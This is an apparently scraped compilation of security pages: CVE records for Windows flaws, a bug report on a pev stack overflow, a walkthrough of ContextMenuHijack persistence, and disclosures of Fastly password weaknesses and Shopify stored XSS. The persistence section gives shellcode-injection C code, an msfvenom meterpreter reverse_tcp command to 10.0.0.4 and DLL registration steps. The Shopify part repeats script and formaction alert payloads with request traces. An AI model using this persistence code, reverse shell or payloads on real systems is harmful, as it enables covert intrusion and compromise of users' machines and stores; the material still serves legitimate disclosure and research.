**What privileges could be gained by an attacker who successfully exploited this vulnerability?**

An attacker who successfully exploited this vulnerability could gain SYSTEM privileges.

CVE-ID

Learn more at National Vulnerability Database (NVD)

• CVSS Severity Rating • Fix Information • Vulnerable Software Versions • SCAP Mappings • CPE Information

Description

Windows Kernel Elevation of Privilege Vulnerability

References

**Note:** References are provided for the convenience of the reader to help distinguish between vulnerabilities. The list is not intended to be complete.

*   MISC:Windows Kernel Elevation of Privilege Vulnerability
*   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23422

Assigning CNA

Microsoft Corporation

Date Record Created

**20230111**

Disclaimer: The record creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.

Phase (Legacy)

Assigned (20230111)

Votes (Legacy)

Comments (Legacy)

Proposed (Legacy)

N/A

This is a record on the CVE List, which provides common identifiers for publicly known cybersecurity vulnerabilities.

Search CVE Using Keywords:  

You can also search by reference using the CVE Reference Maps.

For More Information:  CVE Request Web Form (select "Other" from dropdown)

CVE-2023-23422: Windows Kernel Elevation of Privilege Vulnerability

CVE-ID

Learn more at National Vulnerability Database (NVD)

• CVSS Severity Rating • Fix Information • Vulnerable Software Versions • SCAP Mappings • CPE Information

Description

Windows Kernel Elevation of Privilege Vulnerability

References

**Note:** References are provided for the convenience of the reader to help distinguish between vulnerabilities. The list is not intended to be complete.

*   MISC:Windows Kernel Elevation of Privilege Vulnerability
*   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23421

Assigning CNA

Microsoft Corporation

Date Record Created

**20230111**

Disclaimer: The record creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.

Phase (Legacy)

Assigned (20230111)

Votes (Legacy)

Comments (Legacy)

Proposed (Legacy)

N/A

This is a record on the CVE List, which provides common identifiers for publicly known cybersecurity vulnerabilities.

Search CVE Using Keywords:  

You can also search by reference using the CVE Reference Maps.

For More Information:  CVE Request Web Form (select "Other" from dropdown)

CVE-2023-23421: Windows Kernel Elevation of Privilege Vulnerability

CVE-ID

Learn more at National Vulnerability Database (NVD)

• CVSS Severity Rating • Fix Information • Vulnerable Software Versions • SCAP Mappings • CPE Information

Description

Windows Kernel Elevation of Privilege Vulnerability

References

**Note:** References are provided for the convenience of the reader to help distinguish between vulnerabilities. The list is not intended to be complete.

*   MISC:Windows Kernel Elevation of Privilege Vulnerability
*   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23423

Assigning CNA

Microsoft Corporation

Date Record Created

**20230111**

Disclaimer: The record creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.

Phase (Legacy)

Assigned (20230111)

Votes (Legacy)

Comments (Legacy)

Proposed (Legacy)

N/A

This is a record on the CVE List, which provides common identifiers for publicly known cybersecurity vulnerabilities.

Search CVE Using Keywords:  

You can also search by reference using the CVE Reference Maps.

For More Information:  CVE Request Web Form (select "Other" from dropdown)

CVE-2023-23423: Windows Kernel Elevation of Privilege Vulnerability

**What is the relationship between Mark of the Web and Windows SmartScreen?**

When you download a file from the internet, Windows adds the zone identifier or Mark of the Web as an NTFS stream to the file. So, when you run the file, Windows SmartScreen checks if there is a zone identifier Alternate Data Stream (ADS) attached to the file. If the ADS indicates ZoneId=3 which means that the file was downloaded from the internet, the SmartScreen does a reputation check. For more information on SmartScreen, please visit Microsoft Defender SmartScreen overview | Microsoft Learn.

CVE-ID

Learn more at National Vulnerability Database (NVD)

• CVSS Severity Rating • Fix Information • Vulnerable Software Versions • SCAP Mappings • CPE Information

Description

Windows SmartScreen Security Feature Bypass Vulnerability

References

**Note:** References are provided for the convenience of the reader to help distinguish between vulnerabilities. The list is not intended to be complete.

*   MISC:Windows SmartScreen Security Feature Bypass Vulnerability
*   URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-24880

Assigning CNA

Microsoft Corporation

Date Record Created

**20230131**

Disclaimer: The record creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.

Phase (Legacy)

Assigned (20230131)

Votes (Legacy)

Comments (Legacy)

Proposed (Legacy)

N/A

This is a record on the CVE List, which provides common identifiers for publicly known cybersecurity vulnerabilities.

Search CVE Using Keywords:  

You can also search by reference using the CVE Reference Maps.

For More Information:  CVE Request Web Form (select "Other" from dropdown)

CVE-2023-24880: Windows SmartScreen Security Feature Bypass Vulnerability

Wondershare Dr.Fone v12.9.6 was discovered to contain weak permissions for the service WsDrvInst. This vulnerability allows attackers to escalate privileges via modifying or overwriting the executable.

CVE-2023-27010: CWE-250: Execution with Unnecessary Privileges (4.10)

A Buffer Overflow vulnerabilityexists in Pev 0.81 via the pe_exports function from exports.c.. The array offsets_to_Names is dynamically allocated on the stack using exp->NumberOfFunctions as its size. However, the loop uses exp->NumberOfNames to iterate over it and set its components value. Therefore, the loop code assumes that exp->NumberOfFunctions is greater than ordinal at each iteration. This can lead to arbitrary code execution.

Hello guys.

I have found a bug on pe_exports function from exports.c which allows me to exploit readpe.exe program from pev 0.81 (last release).

The issue occurs on the following lines:

uint64\_t offsets\_to\_Names\[exp\->NumberOfFunctions\];

memset(offsets\_to\_Names, 0, sizeof(offsets\_to\_Names)); // This is needed for VLAs.

//

// Names

//

for (uint32\_t i=0; i < exp\->NumberOfNames; i++) {

uint64\_t entry\_ordinal\_list\_ptr = offset\_to\_AddressOfNameOrdinals + sizeof(uint16\_t) \* i;

uint16\_t \*entry\_ordinal\_list = LIBPE\_PTR\_ADD(ctx->map\_addr, entry\_ordinal\_list\_ptr);

if (!pe\_can\_read(ctx, entry\_ordinal\_list, sizeof(uint16\_t))) {

// TODO: Should we report something?

break;

}

const uint16\_t ordinal = \*entry\_ordinal\_list;

uint64\_t entry\_name\_list\_ptr = offset\_to\_AddressOfNames + sizeof(uint32\_t) \* i;

uint32\_t \*entry\_name\_list = LIBPE\_PTR\_ADD(ctx->map\_addr, entry\_name\_list\_ptr);

if (!pe\_can\_read(ctx, entry\_name\_list, sizeof(uint32\_t))) {

// TODO: Should we report something?

break;

}

const uint32\_t entry\_name\_rva = \*entry\_name\_list;

const uint64\_t entry\_name\_ofs = pe\_rva2ofs(ctx, entry\_name\_rva);

offsets\_to\_Names\[ordinal\] = entry\_name\_ofs;

}

The array offsets_to_Names is dynamically allocated on the stack using exp->NumberOfFunctions as its size (line 104). However, the loop starting at line 111 uses exp->NumberOfNames to iterate over it and set values at line 132. Therefore, this snippet assumes that exp->NumberOfFunctions is greater than ordinal at each iteration.

That condition may be followed by compilers, but not by hackers. What happens if I craft a PE file with ordinal greater than or equal to exp->NumberOfFunctions? Depending on the values, I am able to overwrite the return address of pe_exports function. On Windows 7 and Windows Server 2008 (systems on which I could produce higher impact), I may even use a ROP chain to get an arbitrary code execution.

I have recorded a PoC video to proof the exploitability of the bug on readpe.exe: https://drive.google.com/file/d/1zBH9ykgmHlnWQEBDIxwrYG8CTrHtUf26/view?usp=sharing.

If you guys need any more details about the bug, I am at your disposal!

CVE-2021-45423: Exploitable bug on pe_exports function from exports.c · Issue #35 · merces/libpe

Context menu provides shortcuts to the user in order to perform a number of actions. The context menu is invoked with a right mouse click… 
Continue reading → Persistence – Context Menu

Context menu provides shortcuts to the user in order to perform a number of actions. The context menu is invoked with a right mouse click and it is a very common action for every Windows user. In offensive operations this action could be weaponized for persistence by executing shellcode every time the user attempts to use the context menu.

RistBS developed a proof of concept called ContextMenuHijack which can leverage the context menu for persistence by registering a COM object. The “_VirtualAlloc_” function is used in order to allocate a memory region which the executed shellcode will be stored.

void InjectShc() 
{
    DWORD dwOldProtect = 0;
    LPVOID addr = VirtualAlloc( NULL, sizeof( buf ), MEM\_RESERVE | MEM\_COMMIT, PAGE\_READWRITE );
    memcpy( addr, buf, sizeof( buf ) );

    VirtualProtect( addr, sizeof( buf ), PAGE\_EXECUTE\_READ, &dwOldProtect );

    ( ( void( \* )() )addr )();
}

Context Menu – VirtualAlloc

The code below is used to receive information about the component which the user is going to select and the “_CreateThread_” will create a new thread that will execute the shellcode.

IFACEMETHODIMP FileContextMenuExt::Initialize( LPCITEMIDLIST pidlFolder, LPDATAOBJECT pDataObj, HKEY hKeyProgID )
{
    DWORD tid = NULL;
    CreateThread( NULL, 1024 \* 1024, ( LPTHREAD\_START\_ROUTINE )InjectShc, NULL, 0, &tid );

    if ( NULL == pDataObj ) {
                if ( pidlFolder != NULL ) {
                }
        return S\_OK;
    }
        return S\_OK;
}

Context Menu – Initialize & CreateThread

The “_QueryInterface_” method will query an object for the set of interfaces.

IFACEMETHODIMP FileContextMenuExt::QueryInterface(REFIID riid, void \*\*ppv)
{
    static const QITAB qit\[\] = 
    {
        QITABENT( FileContextMenuExt, IContextMenu  ),
                QITABENT( FileContextMenuExt, IContextMenu2 ),
                QITABENT( FileContextMenuExt, IContextMenu3 ),
        QITABENT( FileContextMenuExt, IShellExtInit ), 
        { 0 },
    };
    return QISearch( this, qit, riid, ppv );

Context Menu – QueryInterface

The context menu handler will be registered as a COM object and therefore the “_RegisterInprocServer_” function is called.

   hr = RegisterInprocServer( szModule, CLSID\_FileContextMenuExt, L"ContextMenuHijack.FileContextMenuExt Class", L"Apartment" );
    if ( SUCCEEDED( hr ) ) {
        hr = RegisterShellExtContextMenuHandler( L"AllFilesystemObjects", CLSID\_FileContextMenuExt, L"ContextMenuHijack.FileContextMenuExt" );
    }
        
    return hr;
}

Context Menu – RegisterInprocServer

The Metasploit framework utility “_msfvenom_” can be used to generated the shellcode that would be written in a text file.

    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.4 LPORT=4444 EXITFUNC=thread -f c > pentestlab.txt

Context Menu – msfvenom Shellcode

Once the code is compiled will generate a DLL. The utility “_regsvr32_” can register the DLL with the operating system.

    regsvr32 ContextMenuHijack.dll

Context Menu – DLL Register Server

Once the user performs a right click on the windows environment over an object (file or folder) the code will executed and a communication channel will established as it can be demonstrated below.

Context Menu – Meterpreter

**References**

*   https://github.com/RistBS/ContextMenuHijack
*   https://ristbs.github.io/2023/02/15/hijack-explorer-context-menu-for-persistence-and-fun.html

**Post navigation**

Persistence – Context Menu

Fastly suffers from the poor practice of sending a temporary password in plaintext.

Correspondence from Fastly declined to comment regarding new discovered  
vulnerabilities within their website.

Poor practices regarding password changes.

1. Reset user password  
2. Access link sent  
3. Temporary password sent plaintext

// HTTP POST request

POST /user/mwebsec%40gmail.com/password/request_reset HTTP/2  
Host: api.fastly.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0)  
Gecko/20100101 Firefox/108.0  
[...]

[...]  
{"g-recaptcha-response":"03AFY_a8UY[...]"}  
[...]

// HTTP response

HTTP/2 200 OK  
Cache-Control: no-store  
[...]

// HTTP GET request

GET  
/auth/user/3lWtx49FrV2.../password/reset/f496875e6e1d88d80aa5.../1677948661/2f2ea8d230adaf03bd749081d...  
HTTP/2  
Host: manage.fastly.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0)  
Gecko/20100101 Firefox/108.0  
[...]

// HTTP response

HTTP/2 200 OK  
Cache-Control: public, max-age=60, stale-if-error=1209600,  
stale-while-revalidate=600  
[...]

Weak Pwd requirements

1. Login to user account  
2. Click Account -> Personal Profile  
3. Select Change Password -> Current Password -> FastLy%2540!1M  
4. Select New Password -> P.P.P.P.P.P.P -> Confirm Password -> P.P.P.P.P.P.P  
5. Select Sign Out Option  
6. Login with new password

// HTTP POST request

POST /oauth/password HTTP/2  
Host: api.fastly.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0)  
Gecko/20100101 Firefox/108.0  
[...]

[...]  
client_id=fastly-ui&grant_type=password&new_password=P.P.P.P.P.P.P&old_password=FastLy%2540!1M&username=mwebsec%  
40gmail.com  
[...]

// HTTP response

HTTP/2 401 Unauthorized  
Status: 401 Unauthorized  
Cache-Control: no-store  
Content-Type: application/json  
[...]

[...]  
{"msg":"Token 3kzBPKXbsbtZBl9..."}  
[...]

// HTTP POST request

POST /oauth/access_token HTTP/2  
Host: api.fastly.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0)  
Gecko/20100101 Firefox/108.0  
[...]

[...]  
client_id=fastly-ui&grant_type=password&password=P.P.P.P.P.P.P&username=mwebsec%  
40gmail.com  
[...]

// HTTP response

HTTP/2 200 OK  
Status: 200 OK  
[...]

[...]  
{"id":"7IU53vPHZ...",  
"name":"manage.fastly.com browser session",  
"user_id":"3lWtx49FrV...",  
"customer_id":"535znFHg...",  
[...]  
"token_type":"bearer",  
"scope":"global",  
"services":[],  
"access_token":"qwdBQF43O..."}  
[...]

Fastly Secret Disclosure

Shopify suffers from a cross site scripting vulnerability.

Correspondence from Shopify declined to comment regarding new discovered  
vulnerabilities within their website.

Although 'frontend' vulnerabilities are considered out of scope,  
person/tester foundhimself a beefy bugbounty from the same page that has  
been listed below, including similar functionality that has not been tested  
yet.

Two emails and several  reports, the 'hacker-1' staff reject the bid for  
findings.

Online Store -> Pages -> Add Page -> Title -> Title_Name -> Content ->  
Paste Payload -> <script src=1 href=1  
onerror="javascript:alert(1)"></script>-> Show HTML -> Fix HTML encoding of  
tags from

<script src=1 href=1 onerror="javascript:alert(1)"></script>

<script src=1 href=1 onerror="javascript:alert(1)"></script>

1. Browse to Online Store  
2. Select Pages ->  Add Page  
3. Set Title -> Title_Name  
4. Set Content -> Paste Payload -> <script src=1 href=1  
onerror="javascript:alert(1)"></script>  
5. Select Show HTML  
6. Fix HTML encoding of tags

<script src=1 href=1 onerror="javascript:alert(1)"></script>

<script src=1 href=1 onerror="javascript:alert(1)"></script>

// HTTP POST request showing XSS payload

POST /admin/online-store/admin/api/unversioned/graphql?operation=PageUpdate  
HTTP/2  
Host: test-img-src-x-onerror-alert1-test.myshopify.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0)  
Gecko/20100101 Firefox/108.0  
[...]

[...]  
"page":{"bodyHtml":"<script src=1 href=1  
onerror=\"javascript:alert(1)\"></script>"  
[...]

// HTTP response

HTTP/2 200 OK  
Content-Type: application/json; charset=utf-8  
[...]

[...]  
page":{"id":"gid://shopify/OnlineStorePage/...","body":"<script src=\"1\"  
href=\"1\"  
onerror=\"javascript:alert(1)\"></script>\n\ntest","title":"Title_Name"  
[...]

Online Store -> Blog Posts -> Add Blog Post -> Title -> Blog_Title ->  
Content -> Paste Payload -> <form><button  
formaction="javascript:javascript:alert(1)">X </button></form> -> Show HTML  
-> Fix HTML encoding of tags from  
<p><form><button  
formaction="javascript:javascript:alert(1)">X</button></form></p>  
to <p><form><button formaction="javascript:javascript:alert(1)">X<br  
/></button></form></p>

1. Browse to Online Store  
2. Select Blog Posts -> Add Blog Post  
3. Set Title -> Blog_Title  
4. Set Content -> Paste Payload -> <script src=1 href=1  
onerror="javascript:alert(1)"></script>  
5. Select Show HTML  
6. Fix HTML encoding of tags

<script src=1 href=1 onerror="javascript:alert(1)"></script>

<script src=1 href=1 onerror="javascript:alert(1)"></script>

// HTTP POST request showing XSS payload

POST  
/admin/online-store/admin/api/unversioned/graphql?operation=ArticleUpdate  
HTTP/2  
Host: test-img-src-x-onerror-alert1-test.myshopify.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0)  
Gecko/20100101 Firefox/108.0  
[...]

[...]  
"article":{"blogId":"gid://shopify/OnlineStoreBlog/...","body":"<script  
src=1 href=1 onerror=\"javascript:alert(1)\"></script>"  
[...]

// HTTP response showing unsanitized payload

HTTP/2 200 OK  
Content-Type: application/json; charset=utf-8  
[...]

[...]  
"article":{"id":"gid://shopify/OnlineStoreArticle/...","title":"Blog_Title","body":"<script  
src=\"1\" href=\"1\"  
onerror=\"javascript:alert(1)\"></script>\n","handle":"blog_title-2"  
[...]

Products -> Collections -> Create Collection -> Title -> Product_Title ->  
Description -> Paste Payload -> <form><button  
formaction="javascript:javascript:alert(1)">X </button></form> -> Show HTML  
-> Fix HTML encoding of tags from  
<p><form><button  
formaction="javascript:javascript:alert(1)">X</button></form></p>  
to <p><form><button formaction="javascript:javascript:alert(1)">X<br  
/></button></form></p>

1. Browse to Products  
2. Select Collections -> Create Collection  
3. Set Title -> Collection_Title  
4. Set Content -> Paste Payload -> <script src=1 href=1  
onerror="javascript:alert(1)"></script>  
5. Select Show HTML  
6. Fix HTML encoding of tags

<script src=1 href=1 onerror="javascript:alert(1)"></script>

<script src=1 href=1 onerror="javascript:alert(1)"></script>

// HTTP POST request showing XSS payload

POST  
/admin/internal/web/graphql/core?operation=CreateCollection&type=mutation  
HTTP/2  
Host: test-img-src-x-onerror-alert1-test.myshopify.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0)  
Gecko/20100101 Firefox/108.0  
[...]

[...]  
"collection":{"title":"Collection_Title","descriptionHtml":"<script src=1  
href=1 onerror=\"javascript:alert(1)\"></script>"  
[...]

// HTTP response showing unsanitized payload

HTTP/2 200 OK  
Content-Type: application/json; charset=utf-8  
[...]

[...]  
"collection":{"id":"gid://shopify/Collection/...","title":"Collection_Title","descriptionHtml":"<script  
src=\"1\" href=\"1\" onerror=\"javascript:alert(1)\"></script>"  
[...]

Products -> Inventory -> View Products -> Double Click on Product -> Title  
-> Inventory_Title -> Description -> Paste Payload -> <form><button  
formaction="javascript:javascript:alert(1)">X </button></form> -> Show HTML  
-> Fix HTML encoding of tags from  
<p><form><button  
formaction="javascript:javascript:alert(1)">X</button></form></p>  
to <p><form><button formaction="javascript:javascript:alert(1)">X<br  
/></button></form></p>

1. Browse to Products  
2. Select Inventory-> View Products  
3. Select Product -> Title -> Product_Title  
4. Set Description  -> Paste Payload -> <script src=1 href=1  
onerror="javascript:alert(1)"></script>  
5. Select Show HTML  
6. Fix HTML encoding of tags

<script src=1 href=1 onerror="javascript:alert(1)"></script>

<script src=1 href=1 onerror="javascript:alert(1)"></script>

// HTTP POST request showing XSS payload

POST /admin/internal/web/graphql/core?operation=UpdateProduct&type=mutation  
HTTP/2  
Host: test-img-src-x-onerror-alert1-test.myshopify.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0)  
Gecko/20100101 Firefox/108.0  
[...]

[...]  
"product":{"descriptionHtml":"<script onerror=\"javascript:alert(1)\"  
href=\"1\" src=\"1\"></script>","workflow":"product-details-update"  
[...]

// HTTP response showing unsanitized payload

HTTP/2 200 OK  
Content-Type: application/json; charset=utf-8  
[...]

[...]  
"product":{"id":"gid://shopify/Product/...","title":"Product_Title","handle":"product_title","descriptionHtml":"<script  
onerror=\"javascript:alert(1)\" href=\"1\" src=\"1\"></script>"  
[...]

Products -> Add Product -> Title -> Product_Title -> Description -> Paste  
Payload -> <form><button formaction="javascript:javascript:alert(1)">X  
</button></form> -> Show HTML -> Fix HTML encoding of tags from  
<p><form><button  
formaction="javascript:javascript:alert(1)">X</button></form></p>  
to <p><form><button formaction="javascript:javascript:alert(1)">X<br  
/></button></form></p>

1. Browse to Products  
2. Add Product -> Title -> Product_Title  
3. Set Description -> Paste Payload -> <script src=1 href=1  
onerror="javascript:alert(1)"></script>  
4. Select Show HTML  
5. Fix HTML encoding of tags

<script src=1 href=1 onerror="javascript:alert(1)"></script>

<script src=1 href=1 onerror="javascript:alert(1)"></script>

// HTTP POST request showing XSS payload

POST /admin/internal/web/graphql/core?operation=UpdateProduct&type=mutation  
HTTP/2  
Host: test-img-src-x-onerror-alert1-test.myshopify.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0)  
Gecko/20100101 Firefox/108.0  
[...]

[...]  
"product":{"descriptionHtml":"<p>&nbsp;</p>...\"><script src=1 href=1  
onerror=\"javascript:alert(1)\"></script>\n</code></pre>"  
[...]

// HTTP response showing unsanitized payload

HTTP/2 200 OK  
Content-Type: application/json; charset=utf-8  
[...]

[...]  
"title":"Gift_Title","><script src=\"1\" href=\"1\"  
onerror=\"javascript:alert(1)\"></script>\n</code></pre>",  
[...]

Products -> Gift Cards -> Add Gift Card Products -> Gift_Title -> Paste  
Payload -> <form><button formaction="javascript:javascript:alert(1)">X  
</button></form> -> Show HTML -> Fix HTML encoding of tags from  
<p><form><button  
formaction="javascript:javascript:alert(1)">X</button></form></p>  
to <p><form><button formaction="javascript:javascript:alert(1)">X<br  
/></button></form></p>

1. Browse to Products  
2. Select Gift Cards  
3. Add Gift Card Products -> Gift_Title  
4. Set Description -> Paste Payload -> <script src=1 href=1  
onerror="javascript:alert(1)"></script>  
5. Select Show HTML  
6. Fix HTML encoding of tags

<script src=1 href=1 onerror="javascript:alert(1)"></script>

<script src=1 href=1 onerror="javascript:alert(1)"></script>

// HTTP POST request showing XSS payload

POST /admin/internal/web/graphql/core?operation=CreateProduct&type=mutation  
HTTP/2  
Host: test-img-src-x-onerror-alert1-test.myshopify.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0)  
Gecko/20100101 Firefox/108.0  
[...]

[...]  
"product":{"title":"Gift_Title","descriptionHtml":"<script src=1 href=1  
onerror=\"javascript:alert(1)\"></script>"  
[...]

// HTTP response showing unsanitized payload

HTTP/2 200 OK  
Content-Type: application/json; charset=utf-8  
[...]

[...]  
"title":"Gift_Title","handle":"gift_title-1","descriptionHtml":"<script  
src=\"1\" href=\"1\" onerror=\"javascript:alert(1)\"></script>"  
[...]

1. Browse to /admin/pages  
2. Template -> Add Section -> Contact Form -> Heading -> XSS Payload  
3. Online Store -> Pages -> Add Page ->

<form><button formaction="javascript:javascript:alert(1)">X</button></form>

https://test-img-src-x-onerror-alert1-test.myshopify.com/admin/settings/notifications

Tag

#windows